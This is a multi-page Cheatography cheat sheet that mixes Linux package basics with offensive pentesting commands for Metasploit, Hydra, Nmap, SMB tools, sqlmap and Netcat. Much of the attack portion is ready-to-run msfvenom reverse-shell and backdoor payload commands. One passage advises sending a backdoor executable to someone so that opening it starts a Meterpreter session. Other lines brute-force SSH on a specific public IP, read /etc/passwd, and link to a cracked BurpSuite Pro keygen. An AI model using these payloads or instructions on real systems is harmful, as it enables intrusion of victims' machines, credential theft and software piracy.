

#### linux basics and easy pentesting tutorials

How to update/upgrade Linux:

What does APT do?

APT (Advanced Packaging Tool) is a set of core tools found inside the Debian operating system. It provides utilities for the installation and removal of software packages and dependencies on a system.

apt is a subset of apt-get and apt-cache commands providing necessary commands for package management.

while apt-get won't be deprecated, as a regular user, you should start using apt more often.

sudo apt install

Installs a package

sudo apt remove

Removes a package

sudo apt purge

Removes package with configuration

sudo apt update

Refreshes repository index

sudo apt upgrade

Upgrades all upgradable packages

sudo apt autoremove

Removes unwanted packages

sudo apt full-upgrade

Upgrades packages with auto-handling of dependencies

sudo apt search

Searches for a program

sudo apt show

Shows package details

sudo apt list

Lists packages with criteria (installed, upgradable etc)

sudo apt edit-sources

edits sources list

sudo apt clean

The clean command clears out the local repository of downloaded package files. It removes everything except the partials folder and lock file from /var/cache/apt/archives/. Use apt clean to free up disk space when necessary, or as part of regularly scheduled maintenance.

sudo apt autoclear

autoclean is another method used to clear out the local repository of downloaded package files, just like clean. The difference between clean and autoclean is that the latter only removes package files that can no longer be downloaded from their sources, and are very likely to be useless

sudo apt update && sudo apt upgrade -y && sudo apt full-upgrade -y && sudo apt autoremove -y

\_\_\_\_\_\_\_

-----

First things to do after installing Linux:

1. Download and Install Latest Updates



By **Malware.py** (malwaredotpy)

cheatography.com/malwaredotpy/

Published 6th July, 2022. Last updated 6th July, 2022. Page 1 of 18.

Sponsored by **ApolloPad.com**Everyone has a novel in them. Finish Yours!



### linux basics and easy pentesting tutorials (cont)

sudo apt update && sudo apt upgrade

2. Install GNOME Tweak Tool

sudo apt install gnome-tweak-tool

3. Install Git

sudo apt install git

4. Install PIP

sudo apt install python3-pip

5. Install GNOME Extensions

Just go to https://extensions.gnome.org/ to download and install your preferred extensions.

6. Play with Different Desktop Environment

To try MATE, run following command in Terminal.

sudo apt install Ubuntu-mate-desktop

To try Cinnamon, run following command in Terminal.

sudo apt-get install cinnamon-desktop-environment

To try KDE, run following command in Terminal.

sudo apt-get install kde-standard

\_\_\_\_\_

How to install a dpkg:

dpkg is a tool for installing, removing, and querying individual packages.

dpkg -i ~/Downloads/file.deb

\_\_\_\_\_\_

-----

How to fix HTB openvpn connection issue:

# vim /etc/sysctl.conf

Set following to 0:

net.ipv6.conf.all.disable\_ipv6 = 0

net.ipv6.conf.default.disable\_ipv6 = 0

net.ipv6.conf.lo.disable\_ipv6 = 0

\_\_\_\_\_\_\_

-----

Virtual Machine Network Types:

Bridge mode:

This connects the virtual network adapter directly to the physical network

NAT

This allows the virtual network adapter to share the host's IP address

Host Only

This creates a private network that the virtual network adapter shares with the host

Custom:



By **Malware.py** (malwaredotpy)

Published 6th July, 2022. Last updated 6th July, 2022. Page 2 of 18. Sponsored by **ApolloPad.com**Everyone has a novel in them. Finish Yours!

https://apollopad.com

cheatography.com/malwaredotpy/



### linux basics and easy pentesting tutorials (cont)

This allows you to create your own virtual network

-----

Free BurpSuite Pro installation:

https://ftuapps.dev/burp-suite-professional-edition-v2-0-11-full-all-addons-keygen/

- 1. Download and Extract
- 2. Run 'BurpSuite Loader & Keygen'
- 3. Press 'run' in upper right hand corner and Burpsuite will load

=========

\_\_\_\_\_\_

How to uncompress with tar:

- -x = extract
- -z = gzipped archive
- -f = get from a file (must be the last command)

'sudo tar -xzf utorrent-server-3.0-ubuntu-10.10-27079.tar.gz'

==========

Routersploit:

Install:

sudo apt-get install python-dev python-pip libncurses5-dev git

git clone https://github.com/reverse-shell/routersploit

cd routersploit

pip install -r requirements.txt

./rsf.py

1. Exploits, Pick the module(Press Tab Twice to Complete Module):

exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/

rsf > use exploits/dlink/dir\_300\_600\_rce

2. Creds:

Modules located under creds/ directory allow running dictionary attacks against various network services.

Following services are currently supported:

ftp

ssh

telnet

http basic auth

http form auth

snmp

rsf > use creds/

creds/ftp\_bruteforce creds/http\_basic\_bruteforce creds/http\_form\_bruteforce creds/snmp\_bruteforce creds/ssh\_default creds/telnet\_default



By **Malware.py** (malwaredotpy)

cheatography.com/malwaredotpy/

Published 6th July, 2022. Last updated 6th July, 2022. Page 3 of 18.

https://apollopad.com

Sponsored by ApolloPad.com

Everyone has a novel in them. Finish



#### linux basics and easy pentesting tutorials (cont)

creds/ftp\_default creds/http\_basic\_default creds/http\_form\_default creds/ssh\_bruteforce creds/telnet\_bruteforce rsf > use creds/ssh\_default

rsf (SSH Default Creds) >

\_\_\_\_\_\_\_

\_\_\_\_\_

#### CrackMapExec

CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve it's functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.

CME makes heavy use of the Impacket library (developed by @asolino) and the PowerSploit Toolkit (developed by @mattifestation) for working with network protocols and performing a variety of post-exploitation techniques.

Although meant to be used primarily for offensive purposes (e.g. red teams), CME can be used by blue teams as well to assess account privileges, find possible misconfigurations and simulate attack scenarios.

"crackmapexec smb <IP>"

"crackmapexec smb <IP> --pass-pol

enumerates password policy

"crackmapexec smb <IP> --shares -u <random name> -p <random name>

==========

#### SmbClient:

smbclient is a client that can 'talk' to an SMB/CIFS server. It offers an interface similar to that of the ftp program. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on.

smbclient -L //<IP>

enumerate shares(users) on a server

smbclient //<IP>/<shares>

Mount to host OS instead of using smbclient:

sudo mkdir /mnt/user

sudo mount -t cifs //<IP>/<shares> /mnt/<share>

sudo mount -t //10.10.10.178/Data /mnt/Data

find . -ls -type f

shows files

\_\_\_\_\_

#### SmbMap:

SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks.

"smbmap -H <IP>"

===========

#### Nmap:

Top 13 Nmap command examples:

1. Basic Nmap Scan against IP or host

"nmap 1.1.1.1"



By **Malware.py** (malwaredotpy)

Published 6th July, 2022. Last updated 6th July, 2022. Page 4 of 18. Sponsored by **ApolloPad.com**Everyone has a novel in them. Finish
Yours!



### linux basics and easy pentesting tutorials (cont)

Now, if you want to scan a hostname, simply replace the IP for the host:

"nmap cloudflare.com"

These kinds of basic scans are perfect for your first steps when starting with Nmap.

2. Scan specific ports or scan entire port ranges on a local or remote server

nmap -p 1-65535 localhost

Nmap is able to scan all possible ports, but you can also scan specific ports, which will report faster results. See below:

nmap -p 80,443 8.8.8.8

3. Scan multiple IP addresses

nmap 1.1.1.1 8.8.8.8

You can also scan consecutive IP addresses:

nmap -p 1.1.1.1,2,3,4

This will scan 1.1.1.1, 1.1.1.2, 1.1.1.3 and 1.1.1.4.

4. Scan IP ranges

nmap -p 8.8.8.0/28

This will scan 14 consecutive IP ranges, from 8.8.8.1 to 8.8.8.14.

An alternative is to simply use this kind of range:

nmap 8.8.8.1-14

You can even use wildcards to scan the entire C class IP range, for example:

nmap 8.8.8.\*

This will scan 256 IP addresses from 8.8.8.1 to 8.8.8.256.

If you ever need to exclude certain IPs from the IP range scan, you can use the "-exclude" option, as you see below:

nmap -p 8.8.8.\* --exclude 8.8.8.1

5. Scan the most popular ports

Using "-top-ports" parameter along with a specific number lets you scan the top X most common ports for that host.

"nmap --top-ports 20 192.168.1.106"

Replace "20" with the desired number.

6. Scan hosts and IP addresses reading from a text file:

Let's suppose you create a list.txt file that contains these lines inside:

192.168.1.106

cloudflare.com

microsoft.com

securitytrails.com

The "-iL" parameter lets you read from that file, and scan all those hosts for you:

"nmap -iL list.txt"

7. Save your Nmap scan results to a file

"nmap -oN output.txt securitytrails.com"



By **Malware.py** (malwaredotpy)

Published 6th July, 2022. Last updated 6th July, 2022. Page 5 of 18.

cheatography.com/malwaredotpy/

Sponsored by **ApolloPad.com**Everyone has a novel in them. Finish
Yours!



### linux basics and easy pentesting tutorials (cont)

8. Disabling DNS name resolution

If you need to speed up your scans a little bit, you can always choose to disable reverse DNS resolution for all your scans. Just add the "-n" parameter.

"nmap -p 80 -n 8.8.8.8"

9. Scan + OS and service detection with fast execution:

Using the "-A" parameter enables you to perform OS and service detection, and at the same time we are combining this with "-T4" for faster execution

"nmap -A -T4 cloudflare.com"

10. Detect service/daemon versions:

This can be done by using -sV parameters

"nmap -sV localhost"

11. CVE detection using Nmap:

One of Nmap's greatest features. If you want to run a full vulnerability test against your target, you can use these parameters:

"nmap -Pn --script vuln 192.168.1.105"

12: FTP brute force attack:

"nmap --script ftp-brute -p 21 192.168.1.105"

13: Scan for MySQL on port 3306

"nmap 10.10.10.50 -p 3306"

\_\_\_\_\_\_\_

How to look up IP Address for a website:

nslookup www.whateversite.com

How to pull a file using Burpsuite:

in a Repeater tab, at the bottom of the request header type:

'url=file:///etc/passwd'

\_\_\_\_\_\_\_

#### #Gobuster

Common Command line options

- -fw force processing of a domain with wildcard results.
- -np hide the progress output.
- -m which mode to use, either dir or dns (default: dir).
- -q disables banner/underline output.

-t

- number of threads to run (default: 10).
- -u full URL (including scheme), or base domain name.
- -v verbose output (show all results).
- -w path to the wordlist used for brute forcing (use for stdin).

Command line options for dns mode



By **Malware.py** (malwaredotpy)

cheatography.com/malwaredotpy/

Published 6th July, 2022. Last updated 6th July, 2022. Page 6 of 18. Sponsored by **ApolloPad.com**Everyone has a novel in them. Finish Yours!



#### linux basics and easy pentesting tutorials (cont)

- -cn show CNAME records (cannot be used with '-i' option).
- -i show all IP addresses for the result.

Command line options for dir mode

- -a <user agent string> specify a user agent string to send in the request header.
- -c <http cookies> use this to specify any cookies that you might need (simulating auth).
- -e specify extended mode that renders the full URL.
- -f append / for directory brute forces.
- -k Skip verification of SSL certificates.
- -l show the length of the response.
- -n "no status" mode, disables the output of the result's status code.
- -o <file> specify a file name to write the output to.
- -p -p -p content -p specify a proxy to use for all requests (scheme much match the URL scheme).
- -r follow redirects.
- -s <status codes> comma-separated set of the list of status codes to be deemed a "positive" (default: 200,204,301,302,307).
- -x <extensions> list of extensions to check for, if any.
- -P <password> HTTP Authorization password (Basic Auth only, prompted if missing).
- -U <username> HTTP Authorization username (Basic Auth only).
- -to <timeout> HTTP timeout. Examples: 10s, 100ms, 1m (default: 10s).

"gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u https://10.10.10.84"

gobuster vhost -w /opt/SecLists/Discovery/DNS/subdomains-top1million.txt -u http://forwardslash.htb

\_\_\_\_\_\_\_

-----

Nikto:

It enables you to get insights about the host IP address, operating system detection and other network security details that are important during penetration testing.

perl nikto.pl -host 209.17.116.7 -useragent bob

\_\_\_\_\_

-----

#Wfuzz:

Wfuzz can be used to look for hidden content, such as files and directories, within a web server, allowing to find further attack vectors. It is worth noting that, the success of this task depends highly on the dictionaries used.

Wfuzz looking for common directories:

"wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ"

Wfuzz looking for common files:

"wfuzz -w wordlist/general/common.txt <site>/FUZZ.php"

You often want to fuzz some sort of data in the URL's query string, this can be achieved by specifying the FUZZ keyword in the URL after a question mark:

"wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ"

\_\_\_\_\_\_\_

-----

Setting up Metasploit:

systemctl start postgresql



By **Malware.py** (malwaredotpy)

Published 6th July, 2022. Last updated 6th July, 2022. Page 7 of 18. Sponsored by **ApolloPad.com**Everyone has a novel in them. Finish
Yours!



### linux basics and easy pentesting tutorials (cont)

msfdb init

db\_status

Metasploit Pro:

https://localhost:3790/

\_\_\_\_\_

-----

Meterpreter Commands:

**Core Commands** 

=========

Command Description

-----

? Help menu

background Backgrounds the current session

bg Alias for background

bgkill Kills a background meterpreter script

bglist Lists running background scripts

bgrun Executes a meterpreter script as a background thread

channel Displays information or control active channels

close Closes a channel

disable\_unicode\_encoding Disables encoding of unicode strings

enable\_unicode\_encoding Enables encoding of unicode strings

exit Terminate the meterpreter session

get\_timeouts Get the current session timeout values

guid Get the session GUID

help Help menu

info Displays information about a Post module

irb Open an interactive Ruby shell on the current session

load Load one or more meterpreter extensions

machine\_id Get the MSF ID of the machine attached to the session

migrate Migrate the server to another process

pivot Manage pivot listeners

pry Open the Pry debugger on the current session

quit Terminate the meterpreter session

read Reads data from a channel

resource Run the commands stored in a file

run Executes a meterpreter script or Post module

secure (Re)Negotiate TLV packet encryption on the session



By **Malware.py** (malwaredotpy)

cheatography.com/malwaredotpy/

Published 6th July, 2022. Last updated 6th July, 2022. Page 8 of 18. Sponsored by **ApolloPad.com**Everyone has a novel in them. Finish Yours!



### linux basics and easy pentesting tutorials (cont)

sessions Quickly switch to another session

set\_timeouts Set the current session timeout values

sleep Force Meterpreter to go quiet, then re-establish session.

transport Change the current transport mechanism

use Deprecated alias for "load"

uuid Get the UUID for the current session

write Writes data to a channel

Stdapi: File system Commands

\_\_\_\_\_

Command Description

-----

cat Read the contents of a file to the screen

cd Change directory

checksum Retrieve the checksum of a file

cp Copy source to destination

dir List files (alias for Is)

download Download a file or directory

edit Edit a file

getlwd Print local working directory

getwd Print working directory

lcd Change local working directory

Ils List local files

Ipwd Print local working directory

Is List files

mkdir Make directory

mv Move source to destination

pwd Print working directory

rm Delete the specified file

rmdir Remove directory

search Search for files

show\_mount List all mount points/logical drives

upload Upload a file or directory

Stdapi: Networking Commands

Command Description

-----



By **Malware.py** (malwaredotpy)

cheatography.com/malwaredotpy/

Published 6th July, 2022. Last updated 6th July, 2022. Page 9 of 18. Sponsored by **ApolloPad.com**Everyone has a novel in them. Finish Yours!



### linux basics and easy pentesting tutorials (cont)

arp Display the host ARP cache

getproxy Display the current proxy configuration

ifconfig Display interfaces

ipconfig Display interfaces

netstat Display the network connections

portfwd Forward a local port to a remote service

resolve Resolve a set of host names on the target

route View and modify the routing table

Stdapi: User interface Commands

**Command Description** 

-----

enumdesktops List all accessible desktops and window stations

getdesktop Get the current meterpreter desktop

idletime Returns the number of seconds the remote user has been idle

keyboard\_send Send keystrokes

keyevent Send key events

keyscan\_dump Dump the keystroke buffer

keyscan\_start Start capturing keystrokes

keyscan\_stop Stop capturing keystrokes

mouse Send mouse events

screenshare Watch the remote user's desktop in real time

screenshot Grab a screenshot of the interactive desktop

setdesktop Change the meterpreters current desktop

uictl Control some of the user interface components

Stdapi: System Commands

**Command Description** 

clearev Clear the event log

drop\_token Relinquishes any active impersonation token.

execute Execute a command

getenv Get one or more environment variable values

getpid Get the current process identifier

getprivs Attempt to enable all privileges available to the current process

getsid Get the SID of the user that the server is running as

getuid Get the user that the server is running as



By **Malware.py** (malwaredotpy)

Published 6th July, 2022. Last updated 6th July, 2022. Page 10 of 18.

cheatography.com/malwaredotpy/

Sponsored by **ApolloPad.com**Everyone has a novel in them. Finish Yours!



### linux basics and easy pentesting tutorials (cont)

kill Terminate a process

localtime Displays the target system's local date and time

pgrep Filter processes by name

pkill Terminate processes by name

ps List running processes

reboot Reboots the remote computer

reg Modify and interact with the remote registry

rev2self Calls RevertToSelf() on the remote machine

shell Drop into a system command shell

shutdown Shuts down the remote computer

steal\_token Attempts to steal an impersonation token from the target process

suspend Suspends or resumes a list of processes

sysinfo Gets information about the remote system, such as OS

Stdapi: Webcam Commands

\_\_\_\_\_

Command Description

-----

record\_mic Record audio from the default microphone for X seconds

webcam\_chat Start a video chat

webcam\_list List webcams

webcam\_snap Take a snapshot from the specified webcam

webcam\_stream Play a video stream from the specified webcam

Stdapi: Audio Output Commands

\_\_\_\_\_

Command Description

-----

play play a waveform audio file (.wav) on the target system

Priv: Elevate Commands

**Command Description** 

\_\_\_\_\_

getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands

\_\_\_\_\_

Command Description

-----



By **Malware.py** (malwaredotpy)

Published 6th July, 2022. Last updated 6th July, 2022. Page 11 of 18.

cheatography.com/malwaredotpy/

Sponsored by **ApolloPad.com**Everyone has a novel in them. Finish
Yours!



#### linux basics and easy pentesting tutorials (cont)

hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands

\_\_\_\_\_

**Command Description** 

-----

timestomp Manipulate file MACE attributes

Creating an executable backdoor with Metasploit:

"msfvenom -p windows/meterpreter/reverse\_tcp LHOST=192.168.3.141 LPORT=4444 -f exe -o payload.exe"

The backdoor.exe file is saved in the path where you executed the command. Upload this file to GitHub or send it to someone, once they open it, your meterpreter session will start

LHOST= Your IP

RHOST= Target IP

List payloads:

"msfvenom -l"

Linux Meterpreter Reverse Shell:

"msfvenom -p linux/x86/meterpreter/reverse\_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f elf > shell.elf"

Linux Bind Meterpreter Shell:

"msfvenom -p linux/x86/meterpreter/bind\_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > bind.elf"

Linux Bind Shell:

"msfvenom -p generic/shell\_bind\_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > term.elf"

Windows Meterpreter Reverse TCP Shell:

"msfvenom -p windows/meterpreter/reverse\_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe"

Windows Reverse TCP Shell:

"msfvenom -p windows/shell/reverse\_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe"

Windows Encoded Meterpreter Windows Reverse Shell:

"msfvenom -p windows/meterpreter/reverse\_tcp -e shikata\_ga\_nai -i 3 -f exe > encoded.exe"

Mac Reverse Shell

"msfvenom -p osx/x86/shell\_reverse\_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f macho > shell.macho"

Mac Bind Shell:

"msfvenom -p osx/x86/shell\_bind\_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f macho > bind.macho"

Web Payloads:

PHP Meterpreter Reverse TCP

msfvenom -p php/meterpreter\_reverse\_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP Meterpreter Reverse TCP

msfvenom -p windows/meterpreter/reverse\_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f asp > shell.asp

JSP Java Meterpreter Reverse TCP



By **Malware.py** (malwaredotpy)

cheatography.com/malwaredotpy/

Published 6th July, 2022. Last updated 6th July, 2022. Page 12 of 18. Sponsored by **ApolloPad.com**Everyone has a novel in them. Finish Yours!



### linux basics and easy pentesting tutorials (cont)

msfvenom -p java/jsp\_shell\_reverse\_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.jsp WAR

msfvenom -p java/jsp\_shell\_reverse\_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f war > shell.war

Scripting Payloads

Python Reverse Shell

msfvenom -p cmd/unix/reverse\_python LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.py

Bash Unix Reverse Shell

msfvenom -p cmd/unix/reverse\_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh

Perl Unix Reverse shell

msfvenom -p cmd/unix/reverse\_perl LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.pl

Shellcode

Windows Meterpreter Reverse TCP Shellcode

msfvenom -p windows/meterpreter/reverse\_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>

Linux Meterpreter Reverse TCP Shellcode

msfvenom -p linux/x86/meterpreter/reverse\_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>

Mac Reverse TCP Shellcode

msfvenom -p osx/x86/shell\_reverse\_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>

Create User

msfvenom -p windows/adduser USER=hacker PASS=Hacker123\$ -f exe > adduser.exe

Metasploit Handler:

use exploit/multi/handler

set PAYLOAD <Payload name>

Set RHOST < Remote IP>

set LHOST <Local IP>

set LPORT < Local Port>

Run

msf> use multi/handler

msf exploit(handler) > set RHOST <remote IP>

msf exploit(handler) > set payload windows/meterpreter/reverse\_tcp

msf exploit(handler) > set LHOST <Listening\_IP>

msf exploit(handler) > set LPORT <Listening\_Port>

msf exploit(handler) > exploit

[\*] Started reverse handler on 192.168.75.35:4444

[\*] Starting the payload handler...

SSH User Enumeration in Metasploit:

AUXILIARY/SCANNER/SSH/SSH\_ENUMUSERS



By **Malware.py** (malwaredotpy)

Published 6th July, 2022. Last updated 6th July, 2022. Page 13 of 18.

cheatography.com/malwaredotpy/

Sponsored by **ApolloPad.com**Everyone has a novel in them. Finish Yours!



### linux basics and easy pentesting tutorials (cont)

>set RHOSTS <target>

>set USERNAME admin

>run

\_\_\_\_\_

Netcat:

Basic Chat Server:

On Your first machine type:

"nc -l 2222"

This will simply listen on port 2222 for any incoming data. On another machine run:

"nc 192.168.0.31 2222"

Next, type anything at all such e.g. "hello world!" and you'll see it echo'd on the listener's shell. Any text entered into either of the shells ends up being displayed on the other machine also.

File transfer - from the server side (listener):

we'll transfer a file from one box (the server) to another box (the client). So as soon as the server receives a connection, the file gets transferred. On the machine where the file exists run the following command:

"nc -l 2222 < filename >"

On the box where you'd like to receive the file, run:

"nc 192.168.0.31 2222 > any\_file\_name"

Note that if you don't point the data to any\_filename, the data will just be displayed in the shell at the receiving end. Also, obviously the receiving file any\_file\_name can be any file name (but is normally the same as the original).

If you wanted to append the contents of filename to an already existing any\_filename, you could use this instead:

"nc 192.168.0.31 2222 >> any\_file\_name"

Note the '>>' rather than just a single '>' (the '>>' appends while the > replaces).

File transfer - from the client side

To transfer a file in the opposite direction use:

"nc -l 2222 > file\_copy"

On the client side (sender in this case) use:

"cat file\_to\_send | nc 192.168.0.31 2222"

To keep the listening open for further data, use the the -k option:

"nc -lk 2222 >> file"

\_\_\_\_\_

Python server for when you want to transfer a file

sudo python3 -m http.server 80

=========

Crunch Wordlist:

crunch 4 4 012345abcdef -o Documents/pass.txt

\_\_\_\_\_\_\_

\_\_\_\_\_

Hydra:

Install hydra with the following commands:



By **Malware.py** (malwaredotpy)

Published 6th July, 2022. Last updated 6th July, 2022. Page 14 of 18. Sponsored by **ApolloPad.com**Everyone has a novel in them. Finish
Yours!



### linux basics and easy pentesting tutorials (cont)

\$ git clone https://github.com/vanhauser-thc/thc-hydra.git

\$ cd thc-hydra/

\$./configure

\$ make

\$ make install

hydra -l admin -P /home/kali/htb/nineveh/10k 10.10.10.43 http-post-form "/department/login.php:username=user&password=PASS:Invalid" -t 64 hydra -l root -p admin 69.167.51.201 -t 4 ssh

hydra -I root -P /usr/share/wordlists/metasploit/piata\_ssh\_userpass.txt 69.167.51.201 -t 4

\_\_\_\_\_

"medusa -h 192.168.1.1 -u "admin" -P hugewordlist.txt -M http"

-h [TARGET]

Target hostname or IP address.

-H [FILE]

Reads target specifications from the file specified rather than from the command line. The file should contain a list separated by newlines.

-u [TARGET]

Target username.

-U [FILE]

Reads target usernames from the file specified rather than from the command line. The file should contain a list separated by newlines.

-p [TARGET]

Target password.

-P [FILE]

Reads target passwords from the file specified rather than from the command line. The file should contain a list separated by newlines.

File containing combo entries. Combo files are colon separated and in the following format: host:user:password. If any of the three fields are left empty, the respective information should be provided either as a single global value or as a list in a file.

-O [FILE]

File to append log information to. Medusa will log all accounts credentials found to be valid or cause an unknown error. It will also log the start and stop times of an audit, along with the calling parameters.

-e [n/s/ns]

Additional password checks ([n] No Password, [s] Password = Username). If both options are being used, they should be specified together ("-e ns"). If only a single option is being called use either "-e n" or "-e s".

-M [TEXT]

Name of the module to execute (without the .mod extension).

-m [TEXT]

Parameter to pass to the module. This can be passed multiple times with a different parameter each time and they will all be sent to the module (i.e. -m Param1 -m Param2, etc.)

Dump all known modules.

-n [NUM]



By Malware.pv

(malwaredotpy)

Published 6th July, 2022. Last updated 6th July, 2022. Page 15 of 18.

Sponsored by ApolloPad.com Everyone has a novel in them. Finish

https://apollopad.com

cheatography.com/malwaredotpy/



### linux basics and easy pentesting tutorials (cont)

Use for non-default TCP port number.

-s

Enable SSL.

-g [NUM]

Give up after trying to connect for NUM seconds (default 3).

Sleep NUM seconds between retry attempts (default 3).

Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.

-t [NUM]

Total number of logins to be tested concurrently. It should be noted that rougly t x T threads could be running at any one time. 381 appears to be the limit on my fairly boring Gentoo Linux host.

-T [NUM]

Total number of hosts to be tested concurrently.

-L

Parallelize logins using one username per thread. The default is to process the entire username before proceeding.

-f

Stop scanning host after first valid username/password found.

Stop audit after first valid username/password found on any host.

-b

Suppress startup banner

Display module's usage information. This should be used in conjunction with the "-M" option. For example, "medusa -M smbnt -q".

Verbose level [0 - 6 (more)]. All messages at or below the specified level will be displayed. The default level is 5.

Error debug level [0 - 10 (more)]. All messages at or below the specified level will be displayed. The default level is 5.

Display version

Available Medusa Modules:

afp.mod: Brute force module for AFP sessions cvs.mod: Brute force module for CVS sessions ftp.mod: Brute force module for FTP/FTPS sessions

http.mod: Brute force module for HTTP

imap.mod: Brute force module for IMAP sessions mssql.mod: Brute force module for MSSQL sessions



By Malware.py (malwaredotpy)

cheatography.com/malwaredotpy/

Published 6th July, 2022. Last updated 6th July, 2022. Page 16 of 18.

Sponsored by ApolloPad.com

Everyone has a novel in them. Finish

Yours!



### linux basics and easy pentesting tutorials (cont)

mysql.mod : Brute force module for MySQL sessions nntp.mod : Brute force module for NNTP sessions

pcanywhere.mod: Brute force module for PcAnywhere sessions

pop3.mod: Brute force module for POP3 sessions

postgres.mod: Brute force module for PostgreSQL sessions

rdp.mod: Brute force module for RDP (Microsoft Terminal Server) sessions

rexec.mod: Brute force module for REXEC sessions rlogin.mod: Brute force module for RLOGIN sessions rsh.mod: Brute force module for RSH sessions

smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions

smtp-vrfy.mod: Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO)

smtp.mod : Brute force module for SMTP Authentication with TLS snmp.mod : Brute force module for SNMP Community Strings

ssh.mod: Brute force module for SSH v2 sessions svn.mod: Brute force module for Subversion sessions telnet.mod: Brute force module for telnet sessions

vmauthd.mod: Brute force module for the VMware Authentication Daemon

vnc.mod : Brute force module for VNC sessions web-form.mod : Brute force module for web form

wrapper.mod: Generic Wrapper Module

\_\_\_\_\_\_

\_\_\_\_\_

SQLmap:

sqlmap -r search.req --batch --force-ssl

sqlmap -r login.req --batch --force-ssl461

- -'search.req = info from search bar results using BurpSuite Repeater using 'Copy to File'
- -'login.req = info from login screen using results from BurpSuite Repeater using 'Copy to File'

How to set a WiFi adapter in Monitor Mode:

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up

or

airmon-ng check kill

airmon-ng start wlan0

\_\_\_\_\_\_\_

-----

I'm not responsible for anything you do



By **Malware.py** (malwaredotpy)

cheatography.com/malwaredotpy/

Published 6th July, 2022. Last updated 6th July, 2022. Page 18 of 18. Sponsored by **ApolloPad.com**Everyone has a novel in them. Finish Yours!